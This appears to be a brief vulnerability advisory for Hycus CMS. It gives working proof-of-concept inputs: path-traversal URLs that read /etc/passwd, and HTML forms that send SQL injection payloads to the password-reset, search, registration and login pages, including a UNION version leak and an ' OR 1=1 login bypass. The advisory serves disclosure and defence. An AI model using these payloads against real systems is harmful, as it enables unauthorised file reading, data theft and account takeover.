|
|
Hycus CMS Multiple Input Validation Vulnerabilities
An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice an unsuspecting user to visit a malicious URI. The following example data isavailable: Local File Include: http://www.example.com/index.php?site=../../../../../../../etc/passwd%00 http://www.example.com/admin.php?site=../../../../../../../etc/passwd%00 SQL Injection: <form action="http://[host]/?user/1/forgotpass.html" method="post" name="main" > <input type="hidden" name="useremail" value="1'SQL_CODE"/> <input type="submit" value="submit" name="submit" /> </form> <form action="http://[host]/?search/1.html" method="post" name="main" > <input type="hidden" name="q" value="search' union select 1,2,@@version -- 3"/> <input type="submit" value="submit" name="submit" /> </form> <form action="http://[host]/?user/1/hregister.html" method="post" name="main" > <input type="hidden" name="full_name" value="username"/> <input type="hidden" name="user_name" value="1'SQL_CODE"/> <input type="hidden" name="usr_email" value="test@mail.com'SQL_CODE"/> <input type="hidden" name="pwd" value="123456"/> <input type="hidden" name="pwd2" value="123456"/> <input type="submit" value="submit" name="submit" /> </form> <form action="http://[host]/?user/1/hlogin.html" method="post" name="main" > <input type="hidden" name="usr_email" value="1' OR 1=1 -- 1"/> <input type="hidden" name="pwd" value="any"/> <input type="submit" value="submit" name="submit" /> </form> |
|
Privacy Statement |